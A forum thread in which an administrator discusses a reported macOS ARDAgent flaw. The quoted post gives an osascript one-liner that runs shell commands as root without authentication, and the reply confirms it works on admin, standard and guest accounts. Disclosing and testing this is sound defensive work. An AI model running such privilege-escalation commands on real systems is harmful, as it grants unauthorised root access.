Quote:
Originally Posted by
afriend
today an anonymous slashdot user posted this little shell command, that uses the ARDAgent to gain root access, without ever needing to authenticate.
the script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
Can be used to things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.
It has been tested by quite a few people, and has been found only to work you are physically at a computer and its logged in.
However where I work we use Network Shares as our home folder, and this hack doesnt seem to work. And I just wanted to make sure that there was no way it would work.
When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
Anyone thinks its possible?
I just tested that on the MacBook Pro I use day to day using an admin account, a normal account and the built in guest account and I have to say...
CRIKEY!
I was hoping maybe it was only a problem if you were logged in as an admin user, but it isn't. I'll test it at work tomorrow when I can get access to my test machines and try it with network clients.
This is really some quite major privilege escalation, it's a built in rootkit.
Thank you very much for bringing that to my attention.